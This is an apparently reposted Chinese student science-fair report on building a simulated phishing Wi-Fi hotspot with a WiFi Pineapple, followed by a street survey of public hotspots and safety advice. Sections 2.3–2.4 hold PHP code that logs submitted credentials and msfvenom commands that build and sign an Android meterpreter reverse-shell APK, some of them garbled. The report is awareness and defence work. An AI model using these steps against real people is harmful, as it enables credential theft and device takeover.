search
基於Wifipineapple對無線安全情況的綜合性調查與研究

基於Wifipineapple對無線安全情況的綜合性調查與研究

本項目已榮獲2017年福建省第32屆青少年科技創新大賽一等獎

摘要:通過設計並進行試驗、實地調查等方式,對無線安全的情況進行綜合性的調查與研究,最終提出合理化建議。利用無線安全審計設備 Wifipineapple 模擬出黑客所使用的「釣魚 Wi-Fi」網頁進行數據的收集和實際體驗。試圖做出對該類行為防範的反思和進一步的建議,提高人們對無線安全的重視意識。

關鍵詞:無線網路安全 綜合性調查和研究 無線安全審計 Wifipineapple Kali Linux 反思和建議

引言

在 21 世紀的今天,通過手機、平板電腦等設備上網已成為了人們生活中不可或缺的一部分,許多人已經拔掉了網線,通過無線連接的方式來連接到互聯網。但近年來,越來越多的黑客通過無線區域網實現違法犯罪行為,這導致了許多人的個人財產和隱私被侵犯。許多地方出現了利用 Wi-Fi 來進行非法活動的現象,讓許多人一不小心就成了受害者。本著創客的精神,我決定對這一現象進行探究,進行實際的實驗測試,並試圖找到破解這一現象可行的好方法、好建議。

1. 模擬出「釣魚 Wi-Fi 」進行數據採集及實際操作實驗

為了更好地收集、分析數據,更客觀地進行研究調查,並體現所謂「釣魚 Wi-Fi 」的原理,我決定仿造一個「釣魚Wi-Fi」熱點,來進行實驗。我利用了一款無線安全審計設備——Wifipineapple(中文名:Wi-Fi 鳳梨,下同)來進行模擬「釣魚Wi-Fi」的實驗和數據採集。

1.1 Wifipineapple 概況

Wifipineapple是一款在國外極受歡迎、十分易用的無線安全審計設備,由開源無線安全審計軟體社區提供軟體支持,但在國內使用的人數和範圍較小,僅有部分愛好者使用,故國內網站可搜索到的資料較少。本次使用了兩台型號為Wifipineapple Mark 5 Plus的設備(其中一台為備用機)。具體參數如下:

CPU:高通 SOC 400 MHz MIPS

運行內存:64 MB

儲存:32 GB(主要用機)/16MB(備用機)

介面:1*USB 2.0,1*有線網口,1*SD卡介面,1*Micro USB

供電:內置6000mA聚合物鋰電池

尺寸(長*寬*厚):107mm*64mm*22mm

2 「釣魚Wi-Fi」原理的模擬

2.1 Wifipineapple的初步調試

為更好地完成此次模擬「釣魚Wi-Fi」原理的實驗,防止出現紕漏,需要在進行後續操作前對設備進行檢查調試。我對設備進行了開機送電和USB介面、電源開關、乙太網介面、SD卡插槽以及後台登陸操作等六項測試。在確保正常后,再開始進行下一步操作。

2.2 「釣魚Wi-Fi」界面的製作、調試、實現

為了高模擬地仿造一個黑客在「釣魚」時的工作過程,我們仿造黑客的工作原理製作了一個類似正規免費熱點的「釣魚Wi-Fi」,以便更好地進行研究。同理可證,在次實驗的可行的基礎上,登錄界面還可以換成支付寶登錄界面、CMCC登錄界面等等,可以實現對信息的竊取。我模擬的「釣魚Wi-Fi」將可以實現對登錄信息的記錄、對設備實時狀態的監控以及對已連接的安卓設備的遠程控制等功能。

2.2.1 「釣魚Wi-Fi」的概況介紹

為了確保收集數據的合理性,確保項目在符合道德倫理以及合法的情況下進行,並考慮到自身因素,我決定將熱點偽裝成學校內部的免費Wi-Fi熱點,用來實現實驗以及相關數據的獲取活動。為了確保連接者的個人信息安全,我會在實驗結束后立即刪除相關隱私數據和記錄。

2.2.2 安裝所需的插件

完成初始化配置后,在瀏覽器中輸入http://172.16.42.1:1471/,選擇左側的Modules選項,點擊Get Modules from WiFiPinapple.com選項,系統將會自動刷新出所有插件。這次,我選擇了實驗所需的三個插件:DNSspoof,Dwall,urlsnraf。逐個安裝。安裝后系統顯示如圖所示:

安裝后,逐個打開插件,使插件進行工作,再加以定製,即完成了軟體的個性化操作。

2.3 模擬「釣魚Wi-Fi」Login登錄界面的製作

釣魚頁面採用HTML和PHP語言編寫,為了美觀,前端採用了Bootstrap框架,在用戶接入WiFi后,會自動重定向至該頁面,隨後用戶會根據提示填入班級姓名,在點擊登入按鈕后,用戶填入的信息會被記錄在log.txt文件中,便於後續的操作以及數據的記錄。具體代碼如下:

header("Content-type: text/html; charset=utf-8")

$com1 = "$_GET[password]"

$com2 = "$_GET[username]"

$file = 'log.txt'

$fp = @fopen($file, 'a')

fwrite($fp,"\r\n$com2\r\n$com1")

fclose($fp)

?>

header("Location: ok.html")

exit;

?>

2.3.1 Login登錄界面與Wifipineapple的整合

事先製作好模擬免費熱點的Login登錄界面。這次我模仿的是虛擬的學校Wi-Fi的認證界面。Login界面製作完成後,需要將界面與Wifipineapple進行整合。首先將所有文件複製到Wifipineapple中的/www/根目錄下。接下來,重啟Wifipineapple執行操作。重啟后,在瀏覽器中輸入http://172.16.42.1,可看到如圖的界面。在相應的界面中按要求輸入班級、姓名,點擊登錄以後,會出現「登陸成功」的提示完成界面,此時登錄信息將會自動記錄到系統/www/文件夾內。

2.4 通過模擬的「釣魚Wi-Fi」實現對已連接安卓設備的遠程控制

除了可以利用模擬的「釣魚Wi-Fi」對已連接設備進行監控外,甚至還可以利用它對已連接的安卓設備進行遠程控制。

2.4.1 使用Kali Linux製作.apk程序並簽名

首先,使用預先安裝好的Kali Linux系統上的Msfvenom應用編輯一個後綴名為.apk的文件,使程序可以在安卓設備上運行。打開終端提示符下輸入命令,使用msfvenom工具來創建有效載荷APK文件:

msfvenom -p android/meterpreter/reversetcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/test.apk

執行后,即可在輸出目錄查看到創建好的.apk文件了。執行下列命令簽名,首先使用密鑰工具創建密鑰庫:

keytool -genkey -v -keystore my-test.Keystore -alias test -keyalg RSA -keysize 2048 -validity 10000

然後使用JARsigner簽名.apk:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-test.Keystore test.apk test

再用JARsigner驗證簽名:

由於Kali Linux沒有預裝Zipalign,需要先執行apt-get install zipalign。然後用zipalign來驗證.apk:

zipalign -v 4 test . ask main.apk

執行完上述操作后,我們就可以得到一個帶有簽名的.apk文件。

接下來,則可以使用Metasploit進行下一步操作。打開Metasploit,執行msfconsole打開控制台。接下來,執行:

註:代碼中的IP地址和埠號應以實際情況而定。

即可完成所有操作,並將製作好的程序上傳到模擬的「釣魚Wi-Fi」熱點。通過以上操作,我們可以發現,在連接未知的熱點時,除了自己的個人信息會被盜取外,自己的設備甚至也可以被隨意控制。這對我們的個人隱私和財產安全都造成了巨大的威脅。

2.5 利用Wifipineapple製作的「釣魚Wi-Fi」的實際嘗試

在製作完上述的釣魚界面后,我們進行了實際的測驗。我建立了一個名為「FreeWiFi-Jianjin」的未加密熱點。打開熱點,開始工作,使用智能手機(安卓系統)連接該熱點,打開瀏覽器,輸入http://172.16.42.1,即可見到如上圖的界面。在輸入個人信息后,將會自動跳轉出一個「登錄成功」的提示。而此時,剛剛輸入的信息則會被記錄到Wifipineapple後台根目錄文件的/www/目錄中。例如,我在班級中輸入「八年十四班」,姓名中輸入「XXX」,則立刻在後台的文件下就可以看到輸入的「八年十四班」和「XXX」等文字,一些不法分子盜用銀行卡密碼等個人數據就是採用此等方式。此外,在Wifipineapple的控制界面,還可以隨意看到連接熱點的手機正在進行操作的情況的截圖。

2.5.1 Wifipineapple製作的「釣魚Wi-Fi」後台信息收集的展示

在上文中login登錄界面製作完成後,使用設備連接Wi-Fi,進入瀏覽器,在地址欄內輸入172.16.42.1,即可進入相應的界面。在界面中輸入「班級」和「姓名」后,輸入的信息將會自動記錄到Wifipineapple後台的/www/文件夾下,我則可以輕易地查看到信息。同理可證,如果把界面換成支付寶的支付界面或者是CMCC的登錄界面,不明就裡的人的信息同樣會被這樣記錄下來,不法分子同樣可以利用此原理獲取賬號、密碼,並實行不法犯罪。這種行為的危害性不言而喻,而一般人通過普通的安全軟體也無法鑒別出連接的無線區域網是否安全。如,我在界面中輸入班級、姓名,在顯示登錄成功后,個人信息在後台中則可以顯示出來。

2.6 對連接「釣魚Wi-Fi」的設備狀態的實時監控的展示

除了上述記錄數據的功能外,Wifipineapple還可實現對連接設備狀態的實時監控,實現對設備正在進行的任務和活動進行監控和盜取數據的目的。在設備連接后,可以在Wifipineapple管理後台中的D-Wall插件中查看到設備實時的狀態。具體查看的過程如下:

1、 在瀏覽器中輸入http://172.16.24.1:1471,進入Wifipineapple後台。

2、 進入D-Wall插件,並使D-Wall插件開始工作。

3、 將設備連接至熱點,即可看到手機所在進行的任務(手機型號:Redmi 3s)。

從上述圖片中可以看出,利用這個「釣魚Wi-Fi」,犯罪分子可以輕而易舉地窺探到你的隱私,對這些信息稍加解密,所有隱私就會完全暴露在犯罪分子的眼皮底下。同時,如果你的個人聊天記錄或者私密文件被犯罪分子非法竊取,那麼損失將會是不可估量的。

2.7 對「釣魚Wi-Fi」的安全性檢測

目前,市面上的許多軟體都帶有「檢測Wi-Fi安全性」的功能。為了鑒別此類軟體是否有效,也為了鑒別本次實驗的「釣魚Wi-Fi」偽裝是否到位,我利用手機上安裝的安全軟體進行了一次安全性檢測。本次利用了「360免費Wi-Fi」這款市面上比較流行的軟體進行檢測。具體的結果如圖所示。

可見,在成功連接我製作的「釣魚Wi-Fi」后,即使是主流的手機Wi-Fi軟體檢測軟體,也無法檢測出它的安全性,甚至被它所迷惑。由此可見,黑客若要偽裝,則可以完全把「釣魚Wi-Fi」偽裝成與安全的Wi-Fi一樣的模式。因此,我們在外時一定要注意網路安全,不要隨意連接不明的Wi-Fi,就算要連接,也要多留一個心眼,以免自己的個人隱私和財產安全受到損失。

2.8 對數據的合法化處理

為了使此次試驗符合道德、法律與倫理的三重共同要求,並不使隱私泄露,做到安全最大化,我在此鄭重承諾:在試驗中,所有數據展示均選取了無關個人隱私的數據,保證數據的合法性、安全性,並在使用過後立即銷毀,保證任何隱私不受外界干擾和竊取,保證符合中華人民共和國相關互聯網法律之規定。

2.9 對上述「釣魚」活動的總結

通過上述嘗試,我可以發現,黑客利用此類釣魚熱點,可以輕而易舉地獲取到我們的賬號密碼,還可以偷窺到我們的隱私,甚至可以直接控制我們的設備,這是何等的可怕啊!目前屢見不鮮的支付寶、銀行卡賬號失竊、銀行卡遭到盜刷的案件很大一部分就是利用此原理完成的。同樣,我還可以把登錄界面製作成CMCC熱點的登錄界面來騙取上網密碼,同理可證,可以仿造的頁面有很多,甚至可以竊取到你個人QQ、微信的賬號以及密碼。此外,在連接了此類熱點后,你的個人隱私將會被一覽無遺,你的手機正在瀏覽界面的狀態的實時截屏將會一五一十地發送到後台,犯罪分子只要進行簡單的解密就可以查看,並竊取相關信息,作為己用。因此,在外時一定要注意手機連接熱點的安全,不要使不法分子有了可乘之機。

3. 對市區內各熱點安全性的實地調查

在經過了之前的網路調查與原理實驗后,我們決定就本市的具體情況,開展一次實地調查,範圍在市區內,主要調查市區內公共熱點的布置、連接流量及安全情況。

3.1 對市區內公共熱點布置情況的調查

經過實際的走訪、調查與觀察后,我們發現,在市中心繁華區域,有許多的的熱點分佈,其中一大部分是公共熱點。而公共熱點又主要分為兩大類:第一類是由餐廳、咖啡館等商家自行提供的熱點,在一定範圍內信號較強;第二類是由移動、電信、聯通提供的收費熱點服務(三大運營商提供的收費熱點名稱分別為:移動:CMCC;電信:ChinaNet;聯通:Chinaunicom),信號適中。

3.2 對兩類熱點的抽樣調查

為了更具體地了解三類熱點的具體情況,我又逐一對三類熱點各抽取了一個,進行實際連接的調查。

我首先對第一類熱點進行了調查。我來到市區內某家茶餐廳,對該店的免費熱點進行了調查。經調查后發現,該店的熱點總體信號較強,在連接人數較多的情況下,仍能保持較流暢的速度。但該熱點的連接方式並非為普通的秘鑰連接,而是採用了商家普遍採用的網頁連接方式,且要求輸入手機號、獲取驗證碼后才可連接。這樣的連接方式,無疑會給不法分子有了可乘之機。所謂的「釣魚WiFi」通常就是偽裝成這樣需要通過網頁連接的熱點,從而在受害者連接后達到犯罪的目的。

接著,我對第二類熱點進行了調查。我們抽取了電信的ChinaNet熱點進行了調查。我來到了市區內該熱點信號最強的地方之一——解放路電信營業廳進行連接調查。通常,這類由運營商運營的熱點是需要收費的熱點,也是通過網頁連接,但需要在連接界面輸入提前註冊好的賬號、密碼才可正常使用。這類熱點雖然比第一類熱點安全係數更高,但仍然有可乘之機(例如使用Wifipineapple克隆該類熱點的網頁,盜取用戶的付費賬號密碼)。

4. 對本次活動的總結

通過此次系統地調查,使我深刻地理解到了無線區域網的安全漏洞之大。我通過一個實驗,模擬了不法分子進行違法犯罪的原理,凸顯了無線區域網安全的薄弱。目前此類犯罪之多正是因為廣大群眾的提防意識不夠造成的,如果我們能夠提高這方面的意識,我們則可以在很大的程度上預防這類犯罪,使我們的財產、個人隱私安全最大化。

5. 提出建議

通過之前的調查,我們對無線網路安全有了一個更深入的理解,當然,對目前層出不窮的利用無線網路實施犯罪的現象,也有了一些自己的建議和看法。我們提出了以下幾點建議:

無線區域網相對於蜂窩移動數據,是一種更快捷、資費更低的連接方式,但若要選擇無線區域網連接,請盡量連接自家的熱點或是自己已知安全的熱點。若連接了不明的熱點,個人隱私和財產安全就很有可能受到損失。

在外出時,若要連接互聯網,請不要貪圖便宜,盡量使用蜂窩移動數據連接。

若實在要連接公共熱點,要在確認熱點安全的情況下連接。

連接已知安全的熱點。現在有很多軟體(如平安Wi-Fi、360免費Wi-Fi等)已經提供了熱點分享和認證服務,若要連接公共熱點,應盡量連接軟體內官方確認安全的熱點。但盡量不要連接除認證熱點外的未知熱點,因為那些熱點的安全性未知,也很容易繞過該類軟體的檢測。

使用公共熱點時,盡量不要使用支付寶、微信等支付服務或進行手機銀行轉賬、購物等,避免造成不必要的損失。若要使用上述服務,請務必使用蜂窩移動數據連接。

多加了解互聯網安全知識,時時綳著一根弦,警惕生活中時常發生的不法行為。

6. 待改進的地方

(1)自動熱點登錄界面尚未實現自動跳轉,後續工程中可添加,以更好地模擬

(2)在後續工作中可以將此實驗作為一個教學的道具,供中國小信息技術課講授無線網路安全知識或是在普及無線網路安全知識時作為演示。

(3)可以進一步將實驗中的截圖解密,做到更直觀的演示。

結語

在多方面的支持下,我成功完成了這次調查,在此就不逐一表達謝意。調查的結果也十分引人深思。被「釣魚Wi-Fi」盜取財產或是侵犯權益的事件時有發生的原因有很多,但我認為,最根本的原因莫過於人們的防範意識不夠或是有一種愛貪小便宜的心理在作祟,這也正給了不法分子可乘之機。避免此類事件不再發生的方法其實很簡單。首先,大家必須提高自己的防範意識,不要為了一點通訊資費而隨意連接不安全的無線熱點,而是盡量使用安全的網路或是蜂窩移動數據上網。這樣,不法分子就不會有可乘之機。希望這次調查可以引起大家對互聯網安全的足夠重視!

參考文獻:《Kali Linux& Back Track滲透測試實戰》 (韓)趙涎元 著 金光愛 譯

熱門推薦

本文由 一點資訊 提供 原文連結

一點資訊
寫了5860316篇文章,獲得23269次喜歡
留言回覆
回覆
精彩推薦